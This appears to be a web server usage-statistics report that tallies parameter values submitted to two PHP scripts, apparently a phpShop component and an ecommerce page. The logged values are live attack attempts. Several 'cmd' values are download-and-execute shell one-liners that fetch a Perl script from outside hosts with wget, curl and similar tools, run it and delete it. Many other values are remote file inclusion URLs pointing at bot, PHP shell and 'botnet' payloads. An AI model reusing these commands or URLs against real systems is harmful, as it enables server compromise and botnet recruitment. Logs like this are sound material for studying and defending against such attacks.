cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet ch http://189.24.36.96:9090/sta.txt;lwp-download http://189. 24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta .txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.oif0tos.com/oi.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm bnet.txt;wget http://noden.110mb.com/bnet.txt;fet ch http://noden.110mb.com/bnet.txt;lwp-download http://noden .110mb.com/bnet.txt;curl -O http://noden.110mb.com/bnet.txt; lynx http://noden.110mb.com/bnet.txt;perl bnet.txt;rm bnet.t xt	2
Parameter	path[docroot]
Value	Accesses
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	25
http://noden.110mb.com/tool25.txt?	12
OTHER:	931
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://freewebs.com/larry123/bot.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	3
Parameter	path[docroot]
Value	Accesses
http://human-design.ru/adm/faqsupport/config/exp667.txt?	7
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://yugifire.t35.com/tool25.dat?	1
http://snock.110mb.com/spread.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://189.24.48.179:8090/start.tx t;fetch http://189.24.48.179:8090/start.txt;lwp-download htt p://189.24.48.179:8090/start.txt;curl -O http://189.24.48.17 9:8090/start.txt;lynx http://189.24.48.179:8090/start.txt;pe rl start.txt;rm start.txt	1
cd /tmp;rm startindo.txt;wget http://start.helloweb.eu/botne t/startindo.txt;fetch http://start.helloweb.eu/botnet/starti ndo.txt;lwp-download http://start.helloweb.eu/botnet/startin do.txt;curl -O http://start.helloweb.eu/botnet/startindo.txt ;lynx http://start.helloweb.eu/botnet/startindo.txt;perl sta rtindo.txt;rm startindo.txt	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://chat.wins.com.br/httd.txt?http://chat.wins.com.br:808 0/httd.txt	1
http://www.raptor.we.bs/bot.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm sta.txt;wget http://189.24.20.53/sta.txt;fetch ht tp://189.24.20.53/sta.txt;lwp-download http://189.24.20.53/s ta.txt;curl -O http://189.24.20.53/sta.txt;lynx http://189.2 4.20.53/sta.txt;perl sta.txt;rm sta.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://64.8.110.2/xpl/ra.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://h1.ripway.com/DiegoVirus/pbot.txt?	11
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://darkcode.h1x.com/c0de/php/phpshell2.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget start.helloweb.eu/botnet/start.txt ;fetch start.helloweb.eu/botnet/start.txt;lwp-download start .helloweb.eu/botnet/start.txt;curl -O start.helloweb.eu/botn et/start.txt;lynx start.helloweb.eu/botnet/start.txt;perl st art.txt;rm start.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.analisenet.com.br/controle/newspublish/id.txt?	1
http://www.handymoney.ru/w1/vai.txt?	1
http://www.freewebs.com/crew-master/apc.txt	1
http://claroline.lct-net.cl/id?	1
http://www.docsite.ru/cache/injektion.txt?	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet ch http://71.41.190.203/start.txt;lwp-download http://71.41. 190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn x http://71.41.190.203/start.txt;perl start.txt;rm -rf start .txt*	1
Parameter	path[docroot]
Value	Accesses
http://www.oslutadores.com/?id=23530	8
http://www.freewebs.com/yahwek/sete.txt?	7
OTHER:	954
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://overowns.googlepages.com/overowns.txt?	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.rj2008.kit.net/p.txt??	7
http://bsthank.t35.com/mundoirc.txt?	5
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://h1.ripway.com/brunoz/botnetpriv8.txt?	5
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/b0mb4do1337/p.txt??	6
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://netbr.org/documents/r57.txt?	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://chatbr.sytes.net:8090/apache2-default/staffpackts/apc .txt	7
http://www.freewebs.com/t420/p.txt??	6
http://76.162.170.34/Photos/pbot??	6
http://redinhu.we.bs/pbot.txt?	6
http://www3.bloglog.com.br/p.t?	5
http://h1.ripway.com/brunoz/botnetpriv8.txt?	5
http://www.capsoir.com/images/TRA.txt?	4
http://gutitaaa.100webspace.net/c.txt?	4
http://www.flyafac.com/images/kua.txt?	4
http://flaw.we.bs/a.txt?	4
OTHER:	919
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/sethz/php.txt?	11
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://raptortx.googlepages.com/inc3.txt??	3
http://drugs.kit.net/priv8.txt?	3
http://63.247.81.138/~ucrol/maya1.txt???	3
http://greedy.we.bs/a.txt?	3
http://seideiaslegais.googlepages.com/own.txt??	3
http://usuarios.arnet.com.ar/larry123/http.txt??	3
http://3sk3nt.kit.net/p.txt?	3
http://www.noixehfoda.xpg.com.br/sss.txt?	3
http://www.lordxpl.xpg.com.br/own.txt?	3
http://www.cfr.cl/mail/bitch.txt??	3
OTHER:	940
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://biancaa1990.fileave.com/script9.txt??	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.rj2009.kit.net/burro.txt?	2
http://usuarios.arnet.com.ar/larry123/prot.txt??	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://freewebs.com/0m4rc170/botz.txt?	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://76.79.79.181/feia.txt?	2
http://mtvktv.no-ip.org/php.txt?	2
http://www.exploreoceans.org/templates/cads.txt?	2
http://www.powertecmt.com.br/img_imagens/ultimate.txt?	2
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://overowns.googlepages.com/donottouch.txt?	10
http://ownzera.googlepages.com/readme.txt?	9
OTHER:	951
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.maconha.us/tester.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt?	9
http://www.iff.coop/.../bre.txt?	4
OTHER:	957
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.fuck-all.kit.net/teste2.txt?	2
http://www.stdr.xpg.com.br/teste_spam.txt?	2
http://www.omgtube.net/importer/hehe.txt?	2
http://seucu.us/p?	2
http://netbr.org/documents/r57.txt?	2
http://www.rj2009.kit.net/p.txt?	2
http://www.computelweb.com.br/modules/news/hehe.txt?	2
http://epr0.kit.net/c?	2
http://www.probiotec.com.br/uploads/traira.txt?	2
http://www.codigoo00000.mail15.su/a1.txt	1
OTHER:	951
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.zeyteen.net/aho.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://usuarios.arnet.com.ar/adrikrasnow/cv.txt?	1
www.acgsoftware.com/1.txt??	1
http://freewebs.com/normancito/prot.txt??	1
http://h1.ripway.com/sur00t/testador.txt?/par	1
http://www.rj2009.kit.net/ddd.txt??	1
http://www.epr0.kit.net/c?	1
http://klzor.web21.f3.k8.com.br/testador.txt	1
http://www.cfr.cl/mail/bitch.jpg??	1
http://thefishhound.com/config/tester.txt?	1
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.gratisweb.com/atk33/regu.txt?	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/xlip3/bot.txt?	1
http://www.freewebs.com/yahwek/xisde.txt.txt?	1
http://www.noticiasfamososblog.xpg.com.br/testeinbox.txt?	1
http://projectyenor2.iespana.es/testeinbox.txt?	1
http://qlzr.host.sk/killall.gif?	1
http://www.acb.bs.it/moodledata/cache/enviar3.jpg?	1
http://mail.tu-varna.acad.bg/test.jpg??	1
ftp://66.0.134.134/h.txt?	1
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/yahwek/phpbot.txt?	4
http://cornuletz.angelfire.com/c99in.txt?	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.elhames.co.uk/r57.txt?	1
http://www.maconha.us/tester	1
http://freewebs.com/larry123/bot.txt??	1
http://www.freewebs.com/playssonn/dq.txt?	1
http://yahwek.dll.googlepages.com/phpbot1.txt?	1
http://www.vsm.gov.tr/http.txt?	1
http://robertinhopeu.iitalia.com/safex.gif?	1
http://bsthank.t35.com/ilegais.txt?	1
http://www.carpegamer.forbrazil.com.br/novo/back.txt??	1
http://www.interirc.net/macaco.txt?	1
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://mateus07.xpg.com.br/lol?	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://raptor.we.bs/bot.txt?	1
http://www.emriz.com/fix.txt??	1
http://javaatualiza.t35.com/xrootuol.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://klzor.web21.f3.k8.com.br/testador.txt	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.rj2009.kit.net/ddd.txt?	6
http://h1.ripway.com/rootz/tut.txt?	6
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://proxysx.t35.com/cmdimbox.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://nodan.110mb.com/tool25.txt?	6
http://members.lycos.co.uk/enviescraps/pbot.txt?	6
http://www.freewebs.com/playssonn/p.txt??	5
OTHER:	953
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://eusoufeliz69.xpg.com.br/lola.txt?http://eusoufeliz69. xpg.com.br/lola.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://nodan.110mb.com/hehe.txt?	6
http://pemlk.iespana.es/tools/tool25.txt?	5
http://qlzrox.iespana.es/sb4?	5
OTHER:	954
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.dolphins-youth.de/pear/inboxvox.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.digownz.kit.net/pbot1.txt??	7
http://www.freewebs.com/h1h1h1/p.txt??	6
http://tibiaowns9.googlepages.com/GIKOBOTS.txt?	5
http://www.stdr.xpg.com.br/compito?	5
http://usuarios.arnet.com.ar/larry123/safe.txt?	5
http://www.fuck-all.kit.net/pbot2.txt?	4
OTHER:	938
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://nartok.com/CMS/cache/cmds.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://lol123.fileave.com/script9.txt??	4
http://ganhador.eushells.org/bot.txt??	4
http://www.pucorp.t5.com.br/lp.txt?	4
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://geocities.com/skido_chua/skido.php?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.chamala.kit.net/tool25.txt	4
http://www.iff.coop/.../bre.txt?	4
http://www.txd.conexaostore.com/tester?	4
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://eduzin96.googlepages.com/l1nm.txt	1
http://snock.host.sk/spread.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://usuarios.arnet.com.ar/larry123/http?	4
http://h1.ripway.com/DiegoVirus/pbot2.txt?	3
http://www.freewebs.com/scanspread/bozo.txt?	3
http://vcsok.com/echo?http://usuarios.arnet.com.ar/larry123/ ka.txt?	3
OTHER:	957
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.grupoproxysx.net/safe.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://electrobox106.com/ow33.txt?	4
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	4
http://kamstorn.googlepages.com/botnet.txt?	3
http://om-autoteile.eu/sk.txt??	3
http://64.32.13.169/ma.txt?	3
http://69.93.214.234/~egacali/images/1.txt?	3
http://www.apocalypticduck.com/skins/advanced/config/exp667. txt?	3
OTHER:	947
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://freewebs.com/larryx23/sk1.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://kt.digital-poison.net/spread.txt?	3
http://www.txd.conexaostore.com/tester	3
http://freewebs.com/normancito/kaka.txt??	3
http://www.stdr.xpg.com.br/1?	3
http://ownedson.110mb.com/a.txt?	3
http://biancaa1990.fileave.com/script9.txt??	3
http://www.timvideo.xpg.com.br/inbox.txt?	3
http://www.ospenetrasitabira.com.br/files/tester.txt?	3
http://www.zeyteen.net/aho.txt??	3
http://freewebs.com/0m4rc170/botz.txt?	3
OTHER:	940
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://80.35.20.109/gmail.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/normancito/asdasd.txt??	2
http://priv8.crewhosting.com/php.txt??	2
http://pesads.com/ss.txt?	2
http://142.176.17.11/r57.txt?\r	2
http://www.apocalypticduck.com/skins/advanced/config/tester. txt?	2
http://www.eldemocrata.org/cache/hehe.txt?	2
http://andravarldar.se/cmd?	2
?	2
OTHER:	954
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebtown.com/scanr0x/ty.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://freewebs.com/0m4rc170/asd.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://63.247.81.138/~ucrol/maya1.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://gikowns.googlepages.com/bn.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/yahwek/xisde.txt.txt?	2
http://snock.110mb.com/shellbot2.txt	1
http://redinhu.we.bs/pbot.txt?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://noden.110mb.com/kua.txt?	2
http://www.corsemusique.com/portail/agenda/muie.txt?	2
http://69.80.227.41/debugbr2/tool25.dat?	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://mail.admnyagan.ru/config/exp667.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://members.lycos.co.uk/enviescraps/cmdr0x.txt?	2
http://xsenharox.xpg.com.br/e_real_nois.txt?	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://joaobenner.fileave.com/script2.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://freewebs.com/0m4rc170/zip.txt?	2
http://qlzr.iespana.es/sb4.gif?	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/sur00tseclan/spread.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://cornuletz.angelfire.com/c99in.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ghostbuster.xpg.com.br/botphp.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.digownz.kit.net/pbot1.txt?	2
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	2
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?	2
http://www.r0n4n.kit.net/Eisoo.txt?	2
http://xsenharox.xpg.com.br/botnet1000.txt?	2
http://scanbx.iespana.es/php.txt??	2
http://pc2you.ro/classes/phpmailer/config/tester.txt?	2
http://noden.110mb.com/heh.txt?	2
http://n0gr0d.t35.com/php.txt?	1
http://nickinfos.100webspace.net/inbox.txt?	1
OTHER:	952
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://smokan.xpl.googlepages.com/bot3.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.rapimusica.com/morgan.txt??	1
http://human-design.ru/adm/faqsupport/config/tester.txt?	1
http://freewebs.com/larryx23/sk1.txt??	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://vulnerable.we.bs/files/safe.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://ir4dex.kit.net/cmd/list.txt??	1
http://h1.ripway.com/wpk/bnet2.txt	1
http://210.246.145.70:32000/bitch.txt???	1
http://redinhu.v10.com.br/pbot.txt?	1
http://razer.we.bs/pbot.txt?	1
http://members.lycos.co.uk/brvoxcards/vai.txt?	1
http://download-seguro.kit.net/cmd?	1
http://utilz.iespana.es/n2.gif?	1
http://raptorupload.googlepages.com/inc3.txt??	1
http://projectyenor2.iespana.es/testeinbox2.txt?	1
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://om-autoteile.eu/sk.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://shop40.websolution365.com/bbs//data/xhev.txt?	1
http://bsthank.t35.com/chuck.txt?	1
http://geocities.yahoo.com.br/bsthank/packetx.txt	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://yahwek.dll.googlepages.com/phpbot1.txt?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebtown.com/xxroxx/teste.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://electrobox106.com/ow33.txt?	3
http://www.freewebs.com/crew-master/pbot.txt	3
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://nickinfos.100webspace.net/autoinbox.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;id	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ghostbuster.xpg.com.br/index2.txt??	2
http://eusoufeliz69.xpg.com.br/lola.txt?	2
http://www.stdr.xpg.com.br/teste_spam.txt?	1
http://d1459929.u68.igempresas.ig.com.br/rave.txt?	1
http://www.ilegais.xpg.com.br/bd??????	1
http://216.222.194.67/bitch.txt???	1
http://www.xsenharox.xpg.com.br/e_sempre_nois.txt?	1
http://www.r57.li/r57.txt?	1
OTHER:	959
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://216.222.194.67/bitch.txt???	1
http://216.222.194.67/~crew/bitch.txt??	1
http://vcsok.com/echo?http://www.cruiseinternational.co.uk// forum/img/nab.txt??	1
http://hackearhotmail.com	1
OTHER:	966
